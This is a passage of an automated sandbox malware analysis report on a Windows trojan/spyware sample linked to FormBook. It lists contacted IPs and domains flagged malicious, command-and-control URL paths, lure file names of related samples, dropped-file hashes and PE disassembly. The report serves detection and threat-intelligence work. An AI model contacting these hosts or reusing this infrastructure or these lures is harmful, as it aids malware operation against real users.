                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown

                                                                                              World Map of Contacted IPs

                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs

                                                                                              Public IPs

                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              172.191.244.62
                                                                                              		redirect.3dns.boxUnited States
                                                                                              		7018ATT-INTERNET4UStrue
                                                                                              63.250.47.40
                                                                                              		www.kexweb.topUnited States
                                                                                              		22612NAMECHEAP-NETUStrue
                                                                                              13.248.169.48
                                                                                              		www.dyme.techUnited States
                                                                                              		16509AMAZON-02UStrue
                                                                                              91.184.0.200
                                                                                              		jobworklanka.onlineNetherlands
                                                                                              		197902HOSTNETNLtrue
                                                                                              172.96.191.39
                                                                                              		bola88site.oneCanada
                                                                                              		59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                                                                                              103.224.182.242
                                                                                              		www.nobartv6.websiteAustralia
                                                                                              		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                              217.70.184.50
                                                                                              		webredir.vip.gandi.netFrance
                                                                                              		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRtrue
                                                                                              148.72.152.174
                                                                                              		www.elsupertodo.netUnited States
                                                                                              		30083AS-30083-GO-DADDY-COM-LLCUStrue
                                                                                              3.33.130.190
                                                                                              		omexai.infoUnited States
                                                                                              		8987AMAZONEXPANSIONGBtrue
                                                                                              43.242.202.169
                                                                                              		www.mizuquan.topHong Kong
                                                                                              		40065CNSERVERSUStrue

                                                                                              General Information

                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                              Analysis ID:1529045
                                                                                              Start date and time:2024-10-08 15:51:40 +02:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 10m 1s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Run name:Run with higher sleep bypass
                                                                                              Number of analysed new started processes analysed:8
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:1
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:jpdy1E8K4A.exe
                                                                                              renamed because original name is a hash value
                                                                                              Original Sample Name:64cccb8039b0fa277f21e1dccbeec520d08d2606dac35912b147372c03e53f56.exe
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.spyw.evad.winEXE@7/2@14/10
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 100%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 97%
                                                                                              • Number of executed functions: 51
                                                                                              • Number of non-executed functions: 302
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .exe
                                                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                              Warnings

                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 92.204.80.11
                                                                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, whois-unverified.domainbox.akadns.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                              • VT rate limit hit for: jpdy1E8K4A.exe

                                                                                              Simulations

                                                                                              Behavior and APIs

                                                                                              TimeTypeDescription
                                                                                              09:53:33API Interceptor6646240x Sleep call for process: netbtugc.exe modified

                                                                                              Joe Sandbox View / Context

                                                                                              IPs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              172.191.244.62enkJ6J7dAn.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.lurknlarkk.xyz/jqkr/
                                                                                              DHL_ 46773482.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.lurknlarkk.xyz/aol7/
                                                                                              CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.tekilla.wtf/fpzw/
                                                                                              CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.tekilla.wtf/fpzw/
                                                                                              Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.tekilla.wtf/fpzw/
                                                                                              PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.tekilla.wtf/fpzw/
                                                                                              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.tekilla.wtf/fpzw/
                                                                                              EGCS-875-S5-SMO M2A.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.lurknlarkk.xyz/cjjz/
                                                                                              PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.tekilla.wtf/fpzw/
                                                                                              AUG 2024 SOA.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.hermesmilano.xyz/f3mz/
                                                                                              63.250.47.40CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.kexweb.top/3bdq/
                                                                                              CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.kexweb.top/3bdq/
                                                                                              Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.kexweb.top/3bdq/
                                                                                              ES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.brupack.online/t8b6/
                                                                                              PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.kexweb.top/3bdq/
                                                                                              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.kexweb.top/3bdq/
                                                                                              k8FSEGGo4d9blGr.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.balclub.top/n6ow/
                                                                                              PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.kexweb.top/3bdq/
                                                                                              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.kexweb.top/3bdq/
                                                                                              ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.kexweb.top/mfb2/
                                                                                              13.248.169.48Pending invoices.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.extrem.tech/lwlk/
                                                                                              Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.firstcry.shop/e4x0/
                                                                                              presupuesto urgente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • www.sleephygienist.org/9ned/
                                                                                              -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.invicta.world/tcs6/
                                                                                              payment copy.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.firstcry.shop/e4x0/
                                                                                              Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.invicta.world/aohi/
                                                                                              shipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.mynotebook.shop/3q2o/
                                                                                              Shipping Documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.sapatarias.online/3632/
                                                                                              shipping notification_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.sapatarias.online/3632/
                                                                                              RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.luxe.guru/s9un/

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              www.nobartv6.websiteCITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                                              • 103.224.182.242
                                                                                              Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                                              • 103.224.182.242
                                                                                              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                                              • 103.224.182.242
                                                                                              PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                                              • 103.224.182.242
                                                                                              RFQ- PNOC- MR 29215 - PJ 324 AL SAILIYA MOSQUE Project.exeGet hashmaliciousFormBookBrowse
                                                                                              • 103.224.182.242
                                                                                              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                                                              • 103.224.182.242
                                                                                              New_Order_Big_Bag_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                              • 103.224.182.242
                                                                                              webredir.vip.gandi.netIRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                                                                              • 217.70.184.50
                                                                                              SOA SIL TL382920.exeGet hashmaliciousFormBookBrowse
                                                                                              • 217.70.184.50
                                                                                              PO-78140924.BAT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                              • 217.70.184.50
                                                                                              NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                                              • 217.70.184.50
                                                                                              CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                                              • 217.70.184.50
                                                                                              rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                                                                              • 217.70.184.50
                                                                                              CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                                              • 217.70.184.50
                                                                                              Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                                              • 217.70.184.50
                                                                                              ES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                              • 217.70.184.50
                                                                                              RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                              • 217.70.184.50
                                                                                              www.elsupertodo.netCITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                                              • 148.72.152.174
                                                                                              CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                                              • 148.72.152.174
                                                                                              Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                                              • 148.72.152.174
                                                                                              PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                                                                              • 148.72.152.174
                                                                                              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                                              • 148.72.152.174
                                                                                              FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                                                                              • 148.72.152.174
                                                                                              PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                                              • 148.72.152.174
                                                                                              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                                                              • 148.72.152.174
                                                                                              COTIZACION 280824.exeGet hashmaliciousFormBookBrowse
                                                                                              • 148.72.152.174
                                                                                              www.kexweb.topCITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                                              • 63.250.47.40
                                                                                              CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                                              • 63.250.47.40
                                                                                              Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                                              • 63.250.47.40
                                                                                              PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                                                                              • 63.250.47.40
                                                                                              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                                              • 63.250.47.40
                                                                                              PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                                              • 63.250.47.40
                                                                                              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                                                              • 63.250.47.40
                                                                                              ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                              • 63.250.47.40
                                                                                              ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                              • 63.250.47.40

                                                                                              ASNs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              ATT-INTERNET4USenkJ6J7dAn.exeGet hashmaliciousFormBookBrowse
                                                                                              • 172.191.244.62
                                                                                              https://simpleinvoices.io/invoices/gvexd57Lej7Get hashmaliciousUnknownBrowse
                                                                                              • 13.32.23.51
                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                              • 13.184.113.170
                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                              • 64.216.147.20
                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                              • 63.197.31.26
                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                              • 68.120.188.218
                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                              • 99.178.79.220
                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                              • 99.59.85.179
                                                                                              https://we.tl/t-BVtGtb0HLzGet hashmaliciousUnknownBrowse
                                                                                              • 13.32.27.128
                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                              • 99.91.154.112
                                                                                              AMAZON-02UStyRPPK48Mk.exeGet hashmaliciousRemcosBrowse
                                                                                              • 18.141.10.107
                                                                                              PO59458.exeGet hashmaliciousFormBookBrowse
                                                                                              • 3.131.150.69
                                                                                              Remittance_Raveis.htmGet hashmaliciousUnknownBrowse
                                                                                              • 3.160.212.126
                                                                                              https://support.squarespacrenewel.retroestyle.com/?DTYUI0=RTDM45Get hashmaliciousUnknownBrowse
                                                                                              • 3.124.134.230
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 52.222.236.120
                                                                                              https://simpleinvoices.io/invoices/gvexd57Lej7Get hashmaliciousUnknownBrowse
                                                                                              • 18.202.131.124
                                                                                              FIR-069114.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 3.5.184.28
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 52.222.236.120
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 52.222.236.23
                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                              • 34.249.145.219
                                                                                              HOSTNETNLhttps://polidos.com/Get hashmaliciousUnknownBrowse
                                                                                              • 91.184.0.111
                                                                                              CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.184.0.200
                                                                                              CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.184.0.200
                                                                                              Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.184.0.200
                                                                                              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.184.0.200
                                                                                              FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.184.0.200
                                                                                              PASU5160894680 DOCS.scr.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.184.0.200
                                                                                              z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.184.0.111
                                                                                              firmware.x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                              • 91.184.0.99
                                                                                              PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.184.0.200
                                                                                              NAMECHEAP-NETUSN2Qncau2rN.exeGet hashmaliciousFormBookBrowse
                                                                                              • 199.192.19.19
                                                                                              q6utlq83i0.exeGet hashmaliciousUnknownBrowse
                                                                                              • 198.54.122.135
                                                                                              RQ#071024.exeGet hashmaliciousFormBookBrowse
                                                                                              • 162.0.238.43
                                                                                              8mmZ7Bkoj1.exeGet hashmaliciousFormBookBrowse
                                                                                              • 199.192.21.169
                                                                                              FDA.exeGet hashmaliciousFormBookBrowse
                                                                                              • 198.54.125.199
                                                                                              PURCHASED ORDER OF ENG091.exeGet hashmaliciousFormBookBrowse
                                                                                              • 63.250.38.167
                                                                                              na.elfGet hashmaliciousMiraiBrowse
                                                                                              • 162.255.117.53
                                                                                              PO_89_202876.Pdf.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 198.54.114.247
                                                                                              Products Order Catalogs20242.exeGet hashmaliciousFormBookBrowse
                                                                                              • 68.65.122.222
                                                                                              IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                                                                              • 162.213.249.216

                                                                                              JA3 Fingerprints

                                                                                              No context

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\Users\user\AppData\Local\Temp\01194HH4

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                              Category:dropped
                                                                                              Size (bytes):196608
                                                                                              Entropy (8bit):1.1239949490932863
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                              MD5:271D5F995996735B01672CF227C81C17
                                                                                              SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                              SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                              SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\supergroups

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\jpdy1E8K4A.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):286720
                                                                                              Entropy (8bit):7.992290227032119
                                                                                              Encrypted:true
                                                                                              SSDEEP:6144:2nZ3Rc4FocdAlupRK/efVB7jgRqLCos9xWQ88NCnuAdmGcvVW8h1e+tTu:2nXFZAwRtBBa9IXiLGIDer
                                                                                              MD5:013D105DD28C87E68C95FB7879662786
                                                                                              SHA1:2103D44500085E108FC70A45A7A7AF6EA7F19310
                                                                                              SHA-256:6852467E78642E5B6713DCCE5E36C0629DD360640CBFE6DE313709D424E44DE5
                                                                                              SHA-512:06B97E4424BCDB1348ED47406EA914D732AF9DAC1943E53C81D4D895493AB024CFFBE0E08125243B1879FB0D73EF3C8FC32246143994F0A57A6BC5058B06473E
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:.....D46I...X...x.6J...yZ]...46IUX0QYUY5D46IUX0QYUY5D46IUX0.YUY;[.8I.Q.p.T..e`^ &x@#62+T).U(;6_%y7<.6AXi<6....yX+PSgXU:uYUY5D460TQ.l92..$S.t5?.K....$S.S...m92./..u5?..061.$S.IUX0QYUYe.46.TY0....5D46IUX0.YWX>E?6I.\0QYUY5D46YAX0QIUY5$06IU.0QIUY5F46OUX0QYUY3D46IUX0Q9QY5F46IUX0SY..5D$6IEX0QYEY5T46IUX0AYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0.-0!AD46-.\0QIUY5.06IEX0QYUY5D46IUX0qYU95D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY5D46IUX0QYUY

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):7.560757969280412
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:jpdy1E8K4A.exe
                                                                                              File size:1'401'503 bytes
                                                                                              MD5:473df0a675ceaba5a7c27f100e7d7491
                                                                                              SHA1:a3f60109a59e91a0e6443367b42a0ee8fd3feae6
                                                                                              SHA256:64cccb8039b0fa277f21e1dccbeec520d08d2606dac35912b147372c03e53f56
                                                                                              SHA512:3bb5f3914c2bc5e4c2ed51382e55a056b60a63dd3b970f1272d993150c39c8a38a2c685b0869ddc7b56949b51d894837faa531fd4316996859c83335a62f1568
                                                                                              SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCWzivG941U4b1LpUthnHerb1TcxJlp:7JZoQrbTFZY1iaCWzGNJLiT+PMh
                                                                                              TLSH:1A55F121B6C68036C2B326719E7EF3699A3D79360337D1D727C82D265EA05416B39B33
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                                                              File Icon

                                                                                              Icon Hash:1733312925935517

                                                                                              Static PE Info

                                                                                              General

                                                                                              Entrypoint:0x4165c1
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:5
                                                                                              OS Version Minor:0
                                                                                              File Version Major:5
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:5
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                                                              Entrypoint Preview

                                                                                              Instruction
                                                                                              call 00007F27BC8C7B2Bh
                                                                                              jmp 00007F27BC8BE99Eh
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              push edi
                                                                                              push esi
                                                                                              mov esi, dword ptr [ebp+0Ch]
                                                                                              mov ecx, dword ptr [ebp+10h]
                                                                                              mov edi, dword ptr [ebp+08h]
                                                                                              mov eax, ecx
                                                                                              mov edx, ecx
                                                                                              add eax, esi
                                                                                              cmp edi, esi
                                                                                              jbe 00007F27BC8BEB1Ah
                                                                                              cmp edi, eax
                                                                                              jc 00007F27BC8BECB6h
                                                                                              cmp ecx, 00000080h
                                                                                              jc 00007F27BC8BEB2Eh
                                                                                              cmp dword ptr [004A9724h], 00000000h
                                                                                              je 00007F27BC8BEB25h
                                                                                              push edi
                                                                                              push esi
                                                                                              and edi, 0Fh
                                                                                              and esi, 0Fh
                                                                                              cmp edi, esi
                                                                                              pop esi
                                                                                              pop edi
                                                                                              jne 00007F27BC8BEB17h
                                                                                              jmp 00007F27BC8BEEF2h
                                                                                              test edi, 00000003h
                                                                                              jne 00007F27BC8BEB26h
                                                                                              shr ecx, 02h
                                                                                              and edx, 03h
                                                                                              cmp ecx, 08h
                                                                                              jc 00007F27BC8BEB3Bh
                                                                                              rep movsd
                                                                                              jmp dword ptr [00416740h+edx*4]
                                                                                              mov eax, edi
                                                                                              mov edx, 00000003h
                                                                                              sub ecx, 04h
                                                                                              jc 00007F27BC8BEB1Eh
                                                                                              and eax, 03h
                                                                                              add ecx, eax
                                                                                              jmp dword ptr [00416654h+eax*4]
                                                                                              jmp dword ptr [00416750h+ecx*4]
                                                                                              nop
                                                                                              jmp dword ptr [004166D4h+ecx*4]
                                                                                              nop
                                                                                              inc cx
                                                                                              add byte ptr [eax-4BFFBE9Ah], dl
                                                                                              inc cx
                                                                                              add byte ptr [ebx], ah
                                                                                              ror dword ptr [edx-75F877FAh], 1
                                                                                              inc esi
                                                                                              add dword ptr [eax+468A0147h], ecx
                                                                                              add al, cl
                                                                                              jmp 00007F27BED37317h
                                                                                              add esi, 03h
                                                                                              add edi, 03h
                                                                                              cmp ecx, 08h
                                                                                              jc 00007F27BC8BEADEh
                                                                                              rep movsd
                                                                                              jmp dword ptr [00000000h+edx*4]

                                                                                              Rich Headers

                                                                                              Programming Language:
                                                                                              • [ C ] VS2010 SP1 build 40219
                                                                                              • [C++] VS2010 SP1 build 40219
                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                              • [ASM] VS2010 SP1 build 40219
                                                                                              • [RES] VS2010 SP1 build 40219
                                                                                              • [LNK] VS2010 SP1 build 40219

                                                                                              Data Directories

                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                              Sections

                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                              Resources

                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                              RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                              RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                              RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                              RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                              RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                              RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                              RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                              RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                              RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                              RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                              RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                              RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
